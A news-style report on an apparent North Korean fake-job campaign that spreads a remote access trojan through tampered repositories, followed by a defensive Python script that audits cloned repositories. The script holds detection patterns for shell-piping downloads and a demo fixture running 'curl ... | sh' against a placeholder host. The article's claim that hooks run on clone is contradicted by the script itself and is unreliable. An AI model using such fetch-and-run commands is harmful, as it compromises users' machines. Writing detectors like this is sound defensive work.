North Korean Fake Job Scams Self-Propagate via Contagious Interview
Security researchers have uncovered a sophisticated attack campaign linked to Democratic People’s Republic of Korea (DPRK) threat actors that combines fake job offers with a worm‑like infection mechanism. The scheme begins with convincing phishing emails that advertise high‑paying remote software‑engineering positions. Recipients are asked to complete a "technical interview" by cloning a GitHub repository that is presented as a test environment. Unbeknownst to the victims, the repository has been compromised; a malicious post‑commit hook or a tampered build script is embedded in the project, allowing the attacker to execute code on the developer’s machine as soon as the repository is cloned or the build process runs.
Once the initial host is infected, the malware leverages the compromised developer’s access tokens to propagate to other repositories the user maintains or contributes to. By injecting a similar hook into those repos, the threat actor creates a self‑propagating chain that spreads the malicious payload across the victim’s entire development ecosystem without any additional user interaction. The payload delivered in this wave is a remote access trojan (RAT) identified as a variant of the "FALLCHILL" malware family, previously attributed to the DPRK "Hidden Cobra" group. The RAT communicates with a command‑and‑control (C2) server via an encrypted HTTPS channel, and upon successful beaconing it drops additional modules that harvest Git credentials, SSH keys, and environment variables.
The ultimate goal of the campaign is exfiltration of proprietary source code and intellectual property, which can be used for resale on underground markets or fed into DPRK’s own state‑sponsored development efforts. In addition, the RAT enables the attackers to execute arbitrary commands, install keyloggers, and establish persistent footholds for future intrusions. Researchers from Unit 42 and Mandiant have linked the infrastructure to IP ranges associated with the Kimsuky APT group, further confirming the nation‑state origin of the operation.
Organizations can mitigate the risk by enforcing strict supply‑chain security practices: verify the integrity of external repositories with checksums or signed commits, restrict CI/CD pipeline permissions, and employ runtime monitoring to detect unusual hook execution. Endpoint detection and response (EDR) solutions should flag post‑commit scripts that attempt to spawn shell processes or write to unexpected locations. Security teams are also advised to educate developers about the dangers of unsolicited job offers that require cloning repositories, and to implement multi‑factor authentication on all accounts that have access to code hosting platforms.
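The last paragraph's advice to flag hook and build scripts before they run can be turned into a pre-build check. The following audit script is an added example written for this page, not code from the article or from the researchers it cites; it assumes the reviewer runs it against a freshly cloned directory and that the project uses a `package.json` (the constructed sample repository it builds is for demonstration only).

```python
"""Audit a freshly cloned repository for scripts that run automatically on
commit, install or build (added example; constructed sample repo inside)."""
import json
import os
import re
import tempfile

# npm/yarn lifecycle scripts that execute without the developer invoking them.
AUTO_RUN_SCRIPTS = {"preinstall", "install", "postinstall", "prepare", "prepublish"}
# Shell-spawning and decode-and-run patterns a reviewer would want surfaced.
SUSPICIOUS = re.compile(
    r"(curl|wget)\s[^|]*\|\s*(ba)?sh|base64\s+(-d|--decode)|eval\s*\(|"
    r"child_process|/dev/tcp/|powershell\s+-(e|enc)\b", re.IGNORECASE)


def audit_repo(path):
    """Return a list of (location, reason) findings for the repo at *path*."""
    findings = []
    hooks_dir = os.path.join(path, ".git", "hooks")
    if os.path.isdir(hooks_dir):
        for name in sorted(os.listdir(hooks_dir)):
            # Git ships only *.sample files here and never clones hooks, so any
            # other file means something wrote a live hook after the clone.
            if not name.endswith(".sample"):
                findings.append((f".git/hooks/{name}", "active git hook present"))
    pkg = os.path.join(path, "package.json")
    if os.path.isfile(pkg):
        with open(pkg, encoding="utf-8") as fh:
            scripts = json.load(fh).get("scripts", {})
        for name, cmd in scripts.items():
            if name in AUTO_RUN_SCRIPTS and SUSPICIOUS.search(cmd):
                findings.append((f"package.json:{name}", f"auto-run script spawns shell: {cmd}"))
    return findings


def demo():
    """Build a constructed repo with a live hook and a tampered postinstall, then audit it."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, ".git", "hooks"))
    with open(os.path.join(root, ".git", "hooks", "post-commit"), "w") as fh:
        fh.write("#!/bin/sh\necho hook\n")  # constructed placeholder hook
    with open(os.path.join(root, "package.json"), "w") as fh:
        json.dump({"scripts": {"test": "jest",
                               "postinstall": "curl -s http://example.invalid/x | sh"}}, fh)
    return audit_repo(root)


if __name__ == "__main__":
    for location, reason in demo():
        print(f"{location}: {reason}")
```

Run it against the clone before `npm install` or any commit; an empty result means no live hook and no auto-run script matching the patterns above, not that the repository is clean.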